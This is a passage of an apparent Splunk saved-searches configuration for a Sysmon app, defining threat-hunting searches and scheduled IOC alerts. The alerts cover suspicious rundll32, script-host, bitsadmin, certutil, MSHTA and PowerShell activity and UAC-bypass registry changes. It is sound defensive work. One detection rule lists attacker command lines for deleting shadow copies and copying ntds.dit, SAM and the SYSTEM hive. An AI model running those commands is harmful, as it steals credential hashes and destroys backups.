["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 523 | display.general.type = statistics 524 | display.page.search.mode = verbose 525 | display.page.search.tab = statistics 526 | display.visualizations.charting.chart = bar 527 | display.visualizations.show = 0 528 | request.ui_dispatch_app = sysmon-splunk-app 529 | request.ui_dispatch_view = search 530 | search = `sysmon` process="rundll32.exe" DllRegisterServer | stats count by Computer,CommandLine 531 | 532 | [rundll32.exe - \\roaming\\ execution] 533 | action.email.useNSSubject = 1 534 | alert.track = 0 535 | dispatch.earliest_time = -24h@h 536 | dispatch.latest_time = now 537 | dispatchAs = user 538 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 539 | display.general.type = statistics 540 | display.page.search.mode = verbose 541 | display.page.search.tab = statistics 542 | display.visualizations.charting.chart = bar 543 | display.visualizations.show = 0 544 | request.ui_dispatch_app = sysmon-splunk-app 545 | request.ui_dispatch_view = search 546 | search = `sysmon` process=rundll32.exe \\roaming\\ | stats count by Computer,CommandLine,ParentCommandLine 547 | 548 | [cscript - http] 549 | action.email.useNSSubject = 1 550 | alert.track = 0 551 | dispatch.earliest_time = -24h@h 552 | dispatch.latest_time = now 553 | dispatchAs = user 554 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 555 | display.general.type = statistics 556 | display.page.search.mode = verbose 557 | display.page.search.tab = statistics 558 | display.visualizations.charting.chart = bar 559 | display.visualizations.show = 0 560 | request.ui_dispatch_app = sysmon-splunk-app 561 | request.ui_dispatch_view = search 562 | search = `sysmon` process="cscript.exe" http | stats count by Computer,CommandLine 563 | 564 | [wscript - js execution] 565 | action.email.useNSSubject = 1 566 | alert.track = 0 567 | dispatch.earliest_time = -24h@h 568 | dispatch.latest_time = now 569 | dispatchAs = user 570 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 571 | display.general.type = statistics 572 | display.page.search.mode = verbose 573 | display.page.search.tab = statistics 574 | display.visualizations.charting.chart = bar 575 | display.visualizations.show = 0 576 | request.ui_dispatch_app = sysmon-splunk-app 577 | request.ui_dispatch_view = search 578 | search = `sysmon` process="wscript.exe" .js | stats count by Computer,CommandLine 579 | 580 | [wscript - vbs or vbe execution] 581 | action.email.useNSSubject = 1 582 | alert.track = 0 583 | dispatch.earliest_time = -24h@h 584 | dispatch.latest_time = now 585 | dispatchAs = user 586 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 587 | display.general.type = statistics 588 | display.page.search.mode = verbose 589 | display.page.search.tab = statistics 590 | display.visualizations.charting.chart = bar 591 | display.visualizations.show = 0 592 | request.ui_dispatch_app = sysmon-splunk-app 593 | request.ui_dispatch_view = search 594 | search = `sysmon` process="wscript.exe" CommandLine=*.vbs* OR CommandLine=*.vbe* | stats count by Computer,CommandLine 595 | 596 | [wscript - Suspicious rar/zip userprofile execution] 597 | action.email.useNSSubject = 1 598 | alert.track = 0 599 | dispatch.earliest_time = -24h@h 600 | dispatch.latest_time = now 601 | dispatchAs = user 602 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 603 | display.general.type = statistics 604 | display.page.search.mode = verbose 605 | display.page.search.tab = statistics 606 | display.visualizations.charting.chart = bar 607 | display.visualizations.show = 0 608 | request.ui_dispatch_app = sysmon-splunk-app 609 | request.ui_dispatch_view = search 610 | search = `sysmon` process="wscript.exe" \\Rar$ OR ".zip" \\appdata\\ | stats count by Computer,CommandLine 611 | 612 | [netsh - all] 613 | action.email.useNSSubject = 1 614 | alert.track = 0 615 | dispatch.earliest_time = -24h@h 616 | dispatch.latest_time = now 617 | dispatchAs = user 618 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 619 | display.general.type = statistics 620 | display.page.search.mode = verbose 621 | display.page.search.tab = statistics 622 | display.visualizations.charting.chart = bar 623 | display.visualizations.show = 0 624 | request.ui_dispatch_app = sysmon-splunk-app 625 | request.ui_dispatch_view = search 626 | search = `sysmon` process="netsh.exe" | stats values(CommandLine) by Computer 627 | 628 | [bitsadmin - all] 629 | action.email.useNSSubject = 1 630 | alert.track = 0 631 | dispatch.earliest_time = -24h@h 632 | dispatch.latest_time = now 633 | dispatchAs = user 634 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 635 | display.general.type = statistics 636 | display.page.search.mode = verbose 637 | display.page.search.tab = statistics 638 | display.visualizations.charting.chart = bar 639 | display.visualizations.show = 0 640 | request.ui_dispatch_app = sysmon-splunk-app 641 | request.ui_dispatch_view = search 642 | search = `sysmon` process="bitsadmin.exe" | stats values(CommandLine) by Computer 643 | 644 | [Net - IPC$ access] 645 | action.email.useNSSubject = 1 646 | alert.track = 0 647 | dispatch.earliest_time = -24h@h 648 | dispatch.latest_time = now 649 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 650 | display.general.type = statistics 651 | display.page.search.mode = verbose 652 | display.page.search.tab = statistics 653 | display.visualizations.charting.chart = bar 654 | display.visualizations.show = 0 655 | request.ui_dispatch_app = sysmon-splunk-app 656 | request.ui_dispatch_view = search 657 | search = `sysmon` process="net.exe" *ipc$* | stats values(CommandLine) by Computer 658 | 659 | [installutil - all] 660 | action.email.useNSSubject = 1 661 | alert.track = 0 662 | dispatch.earliest_time = -24h@h 663 | dispatch.latest_time = now 664 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 665 | display.general.type = statistics 666 | display.page.search.mode = verbose 667 | display.page.search.tab = statistics 668 | display.visualizations.charting.chart = bar 669 | display.visualizations.show = 0 670 | request.ui_dispatch_app = sysmon-splunk-app 671 | request.ui_dispatch_view = search 672 | search = `sysmon` process="installutil.exe" | stats values(CommandLine) by Computer 673 | 674 | [Powershell - EncodedCommand] 675 | action.email.useNSSubject = 1 676 | alert.track = 0 677 | dispatchAs = user 678 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 679 | display.general.type = statistics 680 | display.page.search.mode = verbose 681 | display.page.search.tab = statistics 682 | display.visualizations.charting.chart = bar 683 | display.visualizations.show = 0 684 | request.ui_dispatch_app = sysmon-splunk-app 685 | request.ui_dispatch_view = search 686 | search = `sysmon` process="powershell.exe" (CommandLine="*-encodedcommand*" OR CommandLine="*-enc*" OR CommandLine="-e" OR CommandLine="-ec" OR CommandLine="-encodedcomman" OR CommandLine="-encodedcomma" OR CommandLine="-encodedcomm" OR CommandLine="-encodedcom" OR CommandLine="-encodedco" OR CommandLine="-encodedc" OR CommandLine="-encoded" OR CommandLine="-encode" OR CommandLine="-encod" OR CommandLine="-enco" OR CommandLine="-en")| stats count by CommandLine | top CommandLine 687 | 688 | [Critical Process] 689 | action.email.useNSSubject = 1 690 | alert.track = 0 691 | dispatch.earliest_time = -24h@h 692 | dispatch.latest_time = now 693 | dispatchAs = user 694 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 695 | display.general.type = statistics 696 | display.page.search.mode = verbose 697 | display.page.search.tab = statistics 698 | display.visualizations.charting.chart = bar 699 | display.visualizations.show = 0 700 | display.visualizations.type = singlevalue 701 | request.ui_dispatch_app = sysmon-splunk-app 702 | request.ui_dispatch_view = search 703 | search = `sysmon` process="powershell.exe" OR process="msbuild.exe" OR process="psexec.exe" OR process="at.exe" OR process="schtasks.exe" OR process="net.exe" OR process="vssadmin.exe" OR process="utilman.exe" OR process="wmic.exe" OR process="mshta.exe" OR process="wscript.exe" OR process="cscript.exe" OR process="cmd.exe" OR process="whoami.exe" OR process="mmc.exe" OR process="systeminfo.exe" OR process="csvde.exe" OR process="certutil.exe" | stats count by process 704 | 705 | 706 | [IOC - svchost.exe not run by services.exe] 707 | action.email.useNSSubject = 1 708 | alert.suppress = 0 709 | alert.track = 1 710 | counttype = number of events 711 | cron_schedule = */15 * * * * 712 | dispatch.earliest_time = -15m 713 | display.page.search.mode = verbose 714 | display.visualizations.charting.chart = pie 715 | display.visualizations.type = mapping 716 | enableSched = 1 717 | quantity = 0 718 | relation = greater than 719 | request.ui_dispatch_app = sysmon-splunk-app 720 | request.ui_dispatch_view = search 721 | search = `sysmon` EventCode="1" svchost.exe\ 722 | | search (Image="svchost.exe") (ParentImage!="services.exe") 723 | 724 | [IOC - >5 Critical Process in 10m] 725 | action.email.useNSSubject = 1 726 | alert.suppress = 0 727 | alert.track = 1 728 | counttype = number of events 729 | cron_schedule = */10 * * * * 730 | dispatch.earliest_time = -10m 731 | display.general.type = statistics 732 | display.page.search.mode = verbose 733 | display.page.search.tab = statistics 734 | display.visualizations.charting.chart = pie 735 | display.visualizations.type = mapping 736 | enableSched = 1 737 | quantity = 0 738 | relation = greater than 739 | request.ui_dispatch_app = sysmon-splunk-app 740 | request.ui_dispatch_view = search 741 | search = `sysmon` EventCode="1" (process="powershell.exe" OR process="msbuild.exe" OR process="psexec.exe" OR process="at.exe" OR process="schtasks.exe" OR process="net.exe" OR process="vssadmin.exe" OR process="utilman.exe" OR process="wmic.exe" OR process="mshta.exe" OR process="whoami.exe" OR process="mmc.exe" OR process="systeminfo.exe" OR process="csvde.exe" OR process="nbtstat.exe") ParentImage!="C:\\Program Files (x86)\\Microsoft Visual Studio Common7\\IDE\\devenv.exe" ParentImage="C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Professional\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.Node.x86\\ServiceHub.Host.Node.x86.exe" | bin span=10m _time | stats values(CommandLine), count by host _time 742 | 743 | [IOC - Suspicious Driver Loaded from Temp] 744 | action.email.useNSSubject = 1 745 | alert.suppress = 0 746 | alert.track = 1 747 | counttype = number of events 748 | cron_schedule = */20 * * * * 749 | description = Driver loaded from /temp/ directory 750 | dispatch.earliest_time = -20m 751 | display.page.search.mode = verbose 752 | display.visualizations.charting.chart = pie 753 | enableSched = 1 754 | quantity = 0 755 | relation = greater than 756 | request.ui_dispatch_app = sysmon-splunk-app 757 | request.ui_dispatch_view = search 758 | search = `sysmon` EventCode=6 ImageLoaded="*\Temp\*" 759 | 760 | [IOC - Suspicious Exe Path] 761 | action.email.useNSSubject = 1 762 | alert.suppress = 0 763 | alert.track = 1 764 | counttype = number of events 765 | cron_schedule = */20 * * * * 766 | dispatch.earliest_time = -20m 767 | display.page.search.mode = verbose 768 | display.visualizations.charting.chart = pie 769 | enableSched = 1 770 | quantity = 0 771 | relation = greater than 772 | request.ui_dispatch_app = sysmon-splunk-app 773 | request.ui_dispatch_view = search 774 | search = `sysmon` EventCode="1" (Image="$Recycle.bin" OR process="Users\\All Users\\*" OR process="Users\\Default\\*" OR process="C:\\Perflogs\\*" OR process="config\\systemprofile\\*" OR process="Windows\\Fonts\\*" OR process="Windows\\IME\\*" OR process="Windows\\addins\\*") 775 | 776 | [IOC - Eventviewer UAC Bypass] 777 | action.email.useNSSubject = 1 778 | alert.suppress = 0 779 | alert.track = 1 780 | counttype = number of events 781 | cron_schedule = */20 * * * * 782 | description = Detects UAC bypass method using Windows event viewer 783 | dispatch.earliest_time = -20m 784 | display.page.search.mode = verbose 785 | display.visualizations.charting.chart = pie 786 | enableSched = 1 787 | quantity = 0 788 | relation = greater than 789 | request.ui_dispatch_app = sysmon-splunk-app 790 | request.ui_dispatch_view = search 791 | search = `sysmon` EventCode=13 TargetObject="HKey_Users\\mscfile*" 792 | 793 | [IOC - UAC Bypass sdclt] 794 | action.email.useNSSubject = 1 795 | alert.suppress = 0 796 | alert.track = 1 797 | counttype = number of events 798 | cron_schedule = */20 * * * * 799 | description = Detects changes to HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand 800 | dispatch.earliest_time = -20m 801 | display.page.search.mode = verbose 802 | display.visualizations.charting.chart = pie 803 | enableSched = 1 804 | quantity = 0 805 | relation = greater than 806 | request.ui_dispatch_app = sysmon-splunk-app 807 | request.ui_dispatch_view = search 808 | search = `sysmon` EventCode=13 TargetObject="HKEY_USERS\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" 809 | 810 | [IOC - Powershell Suspicious Strings] 811 | action.email.useNSSubject = 1 812 | alert.suppress = 0 813 | alert.track = 1 814 | counttype = number of events 815 | cron_schedule = */20 * * * * 816 | dispatch.earliest_time = -20m 817 | display.general.type = statistics 818 | display.page.search.mode = verbose 819 | display.page.search.tab = statistics 820 | display.visualizations.charting.chart = pie 821 | display.visualizations.type = mapping 822 | enableSched = 1 823 | quantity = 0 824 | relation = greater than 825 | request.ui_dispatch_app = sysmon-splunk-app 826 | request.ui_dispatch_view = search 827 | search = `sysmon` EventCode=1 powershell.exe Invoke* OR IEX OR Download* \ 828 | | table _time, host, ProcessID, process, CommandLine, ParentProcessId, ParentImage, ParentCommandLine 829 | 830 | [IOC - Abnormally long Powershell Command] 831 | action.email.useNSSubject = 1 832 | alert.suppress = 0 833 | alert.track = 1 834 | counttype = number of events 835 | cron_schedule = */20 * * * * 836 | dispatch.earliest_time = -20m 837 | display.page.search.mode = verbose 838 | display.visualizations.charting.chart = pie 839 | display.visualizations.type = mapping 840 | enableSched = 1 841 | quantity = 0 842 | relation = greater than 843 | request.ui_dispatch_app = sysmon-splunk-app 844 | request.ui_dispatch_view = search 845 | search = `sysmon` EventCode=1 process=powershell.exe | eval c_length=len(CommandLine) | where c_length>500 846 | 847 | [IOC - Commands run from Office Doc/Browser] 848 | action.email.useNSSubject = 1 849 | alert.suppress = 0 850 | alert.track = 1 851 | counttype = number of events 852 | cron_schedule = */15 * * * * 853 | dispatch.earliest_time = -15m 854 | display.general.type = statistics 855 | display.page.search.mode = verbose 856 | display.page.search.tab = statistics 857 | display.visualizations.charting.chart = pie 858 | display.visualizations.type = mapping 859 | enableSched = 1 860 | quantity = 0 861 | relation = greater than 862 | request.ui_dispatch_app = sysmon-splunk-app 863 | request.ui_dispatch_view = search 864 | search = `sysmon` EventCode=1 ParentImage="C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE" OR ParentImage="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OUTLOOK.EXE" OR ParentImage="C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE" OR ParentImage="C:\\Program Files (x86)\\Microsoft Office\\Office14\\POWERPNT.EXE" OR ParentImage="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" OR ParentImage="C:\\Program Files\\Internet Explorer\\iexplore.exe" OR ParentImage="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" OR ParentImage="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe" AND (Image="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" OR Image="C:\\Windows\\System32\\cmd.exe" OR Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" OR Image="C:\\Windows\\System32\\rundll32.exe" OR Image="C:\\Windows\\System32\\wscript.exe" OR Image="C:\\Windows\\System32\\cscript.exe") CurrentDirectory!="C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\Browser\\WCChromeExtn\\" CurrentDirectory!="C:\\Users\\AppData\\Local\\Blue Jeans\\App\\" CommandLine!="*ScreenConnect*" CommandLine!="C:\\windows\\system32\\rundll32.exe C:\\windows\\system32\\inetcpl.cpl,ClearMyTracksByProcess*"| table _time host ParentImage CommandLine 865 | 866 | [IOC - Suspicious binary launch location] 867 | action.email.useNSSubject = 1 868 | alert.suppress = 0 869 | alert.track = 1 870 | counttype = number of events 871 | cron_schedule = */15 * * * * 872 | dispatch.earliest_time = -15m 873 | display.page.search.mode = fast 874 | display.visualizations.charting.chart = pie 875 | display.visualizations.type = mapping 876 | enableSched = 1 877 | quantity = 0 878 | relation = greater than 879 | request.ui_dispatch_app = sysmon-splunk-app 880 | request.ui_dispatch_view = search 881 | search = `sysmon` EventCode="1" (Image="C:\\windows\\fonts\\*" OR Image="C:\\windows\\help\\*" OR Image="C:\\windows\\wbem\\*" OR Image="C:\\windows\\addins\\*" OR Image="C:\\windows\\debut\\*" OR Image="C:\\windows\\system32\\tasks*" OR Image="C:\\windows\\tasks\\*" OR Image="C:\\debug\\*") 882 | 883 | [IOC - Suspicious execution of rundll - User Profile/Browser] 884 | action.email.useNSSubject = 1 885 | alert.suppress = 0 886 | alert.track = 1 887 | counttype = number of events 888 | cron_schedule = */20 * * * * 889 | dispatch.earliest_time = -20m 890 | display.page.search.mode = verbose 891 | display.visualizations.charting.chart = pie 892 | display.visualizations.type = mapping 893 | enableSched = 1 894 | quantity = 0 895 | relation = greater than 896 | request.ui_dispatch_app = sysmon-splunk-app 897 | request.ui_dispatch_view = search 898 | search = `sysmon` EventCode=1 Image="C:\\Windows\\system32\\rundll32.exe" CommandLine=*C:\\Users\\* ParentCommandLine="C:\\Program Files\\Internet Explorer\\Iexplore.exe\" 899 | 900 | [IOC - Certutil Decode in Appdata] 901 | action.email.useNSSubject = 1 902 | alert.suppress = 0 903 | alert.track = 1 904 | counttype = number of events 905 | cron_schedule = */20 * * * * 906 | description = Detetcs a Microsoft certutil execution with the 'decode' sub command on files in the AppData folder, which is sometimes used to decode malicious code with the built-in certutil utility 907 | dispatch.earliest_time = -20m 908 | display.page.search.mode = verbose 909 | display.visualizations.charting.chart = pie 910 | enableSched = 1 911 | quantity = 0 912 | relation = greater than 913 | request.ui_dispatch_app = sysmon-splunk-app 914 | request.ui_dispatch_view = search 915 | search = `sysmon` EventCode=1 process="certutil.exe" CommandLine="* -decode AppData\\*" 916 | 917 | [IOC - Download from bitsadmin] 918 | action.email.useNSSubject = 1 919 | alert.suppress = 0 920 | alert.track = 1 921 | counttype = number of events 922 | cron_schedule = */20 * * * * 923 | description = Detects usage of bitsadmin downloading a file 924 | dispatch.earliest_time = -20m 925 | display.page.search.mode = verbose 926 | display.visualizations.charting.chart = pie 927 | enableSched = 1 928 | quantity = 0 929 | relation = greater than 930 | request.ui_dispatch_app = sysmon-splunk-app 931 | request.ui_dispatch_view = search 932 | search = `sysmon` EventCode=1 process="bitsadmin.exe" CommandLine="/transfer" 933 | 934 | [IOC - MSHTA Spawning Windows Shell] 935 | action.email.useNSSubject = 1 936 | alert.suppress = 0 937 | alert.track = 1 938 | counttype = number of events 939 | cron_schedule = */20 * * * * 940 | description = Detects a Windows command line executable started from MSHTA 941 | dispatch.earliest_time = -20m 942 | display.page.search.mode = verbose 943 | display.visualizations.charting.chart = pie 944 | enableSched = 1 945 | quantity = 0 946 | relation = greater than 947 | request.ui_dispatch_app = sysmon-splunk-app 948 | request.ui_dispatch_view = search 949 | search = `sysmon` EventCode=1 ParentImage=*\\mshta.exe (process="cmd.exe" OR process="powershell.exe" OR process="wscript.exe" OR process="cscript.exe" OR process="sh.exe" OR process="bash.exe") 950 | 951 | [IOC - Process Created by MMC] 952 | action.email.useNSSubject = 1 953 | alert.suppress = 0 954 | alert.track = 1 955 | counttype = number of events 956 | cron_schedule = */20 * * * * 957 | description = Processes started by MMC could by a sign of lateral movement using MMC application COM object 958 | dispatch.earliest_time = -20m 959 | display.page.search.mode = verbose 960 | display.visualizations.charting.chart = pie 961 | enableSched = 1 962 | quantity = 0 963 | relation = greater than 964 | request.ui_dispatch_app = sysmon-splunk-app 965 | request.ui_dispatch_view = search 966 | search = `sysmon` EventCode=1 ParentImage=*\\mmc.exe process="cmd.exe" CommandLine!="runcmd.cmd" 967 | 968 | [IOC - Shellcode Injected from Office] 969 | action.email.useNSSubject = 1 970 | alert.suppress = 0 971 | alert.track = 1 972 | counttype = number of events 973 | cron_schedule = */20 * * * * 974 | dispatch.earliest_time = -20m 975 | display.page.search.mode = verbose 976 | display.visualizations.charting.chart = pie 977 | enableSched = 1 978 | quantity = 0 979 | relation = greater than 980 | request.ui_dispatch_app = sysmon-splunk-app 981 | request.ui_dispatch_view = search 982 | search = `sysmon` EventCode=10 TargetImage="verclsid.exe" GrantedAccess="0x1FFFFF" (CallTrace="*|UNKNOWN(*VBE7.DLL*" OR (SourceImage="Microsoft Office\\*" AND CallTrace="*|UNKNOWN*")) 983 | 984 | [IOC - Suspicious Powershell Exe from Scripting] 985 | action.email.useNSSubject = 1 986 | alert.suppress = 0 987 | alert.track = 1 988 | counttype = number of events 989 | cron_schedule = */20 * * * * 990 | dispatch.earliest_time = -20m 991 | display.page.search.mode = verbose 992 | display.visualizations.charting.chart = pie 993 | enableSched = 1 994 | quantity = 0 995 | relation = greater than 996 | request.ui_dispatch_app = sysmon-splunk-app 997 | request.ui_dispatch_view = search 998 | search = `sysmon` EventCode=1 (ParentImage="wscript.exe" OR ParentImage="cscript.exe") process="powershell.exe" 999 | 1000 | [IOC - Suspicious Script Execution] 1001 | action.email.useNSSubject = 1 1002 | alert.suppress = 0 1003 | alert.track = 1 1004 | counttype = number of events 1005 | cron_schedule = */20 * * * * 1006 | description = Detects suspicious file execution by wscript and cscript 1007 | dispatch.earliest_time = -20m 1008 | display.page.search.mode = verbose 1009 | display.visualizations.charting.chart = pie 1010 | enableSched = 1 1011 | quantity = 0 1012 | relation = greater than 1013 | request.ui_dispatch_app = sysmon-splunk-app 1014 | request.ui_dispatch_view = search 1015 | search = `sysmon` EventCode=1 (process="wscript.exe" OR process="cscript.exe") (CommandLine="*.jse" OR CommandLine="*.vbe" OR CommandLine="*.js" OR CommandLine="*.vba" OR CommandLine="*.vbe") 1016 | 1017 | [IOC - Vssadmin Activity] 1018 | action.email.useNSSubject = 1 1019 | alert.suppress = 0 1020 | alert.track = 1 1021 | counttype = number of events 1022 | cron_schedule = */20 * * * * 1023 | description = Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely 1024 | dispatch.earliest_time = -20m 1025 | display.page.search.mode = verbose 1026 | display.visualizations.charting.chart = pie 1027 | enableSched = 1 1028 | quantity = 0 1029 | relation = greater than 1030 | request.ui_dispatch_app = sysmon-splunk-app 1031 | request.ui_dispatch_view = search 1032 | search = `sysmon` EventCode=1 (CommandLine="vssadmin.exe Delete Shadows" OR CommandLine="vssadmin create shadow /for=C:" OR CommandLine="copy \\\\?\\GLOBALROOT\\Device\\windows\\ntds\\ntds.dit" OR CommandLine="copy \\?\GLOBALROOT\Device\*\config\SAM" OR CommandLine="vssadmin delete shadows /for=C:" OR CommandLine="reg SAVE HKLM\SYSTEM ") 1033 | 1034 | [IOC - MSHTA JavaScript Invoke] 1035 | action.email.useNSSubject = 1 1036 | action.securityanalytics_ar.param.verbose = 0 1037 | alert.suppress = 0 1038 | alert.track = 1 1039 | counttype = number of events 1040 | cron_schedule = */20 * * * * 1041 | dispatch.earliest_time = -20m 1042 | display.general.type = statistics 1043 | display.page.search.tab = statistics 1044 | display.visualizations.charting.chart = bar 1045 | enableSched = 1 1046 | quantity = 0 1047 | relation = greater than 1048 | request.ui_dispatch_app = sysmon-splunk-app 1049 | request.ui_dispatch_view = search 1050 | search = `sysmon` EventCode=1 process=mshta.exe CommandLine=*javascript:* | table Computer ParentImage ParentCommandLine process CommandLine user LogonGuid 1051 | 1052 | [IOC - Powershell Suspicious Strings 01] 1053 | action.email.useNSSubject = 1 1054 | action.securityanalytics_ar.param.verbose = 0 1055 | alert.suppress = 0 1056 | alert.track = 1 1057 | counttype = number of events 1058 | cron_schedule = */20 * * * * 1059 | dispatch.earliest_time = -20m 1060 | display.general.type = statistics 1061 | display.page.search.mode = verbose 1062 | display.page.search.tab = statistics 1063 | display.visualizations.charting.chart = pie 1064 | display.visualizations.type = mapping 1065 | enableSched = 1 1066 | quantity = 0 1067 | relation = greater than 1068 | request.ui_dispatch_app = sysmon-splunk-app 1069 | request.ui_dispatch_view = search 1070 | search = `sysmon` EventCode=1 process=powershell.exe (*-W*Hidden* OR *-nologo* OR *-nop* OR *IEX* OR *Out-MiniDump* OR *-enc* OR *-EncodedCommand* OR 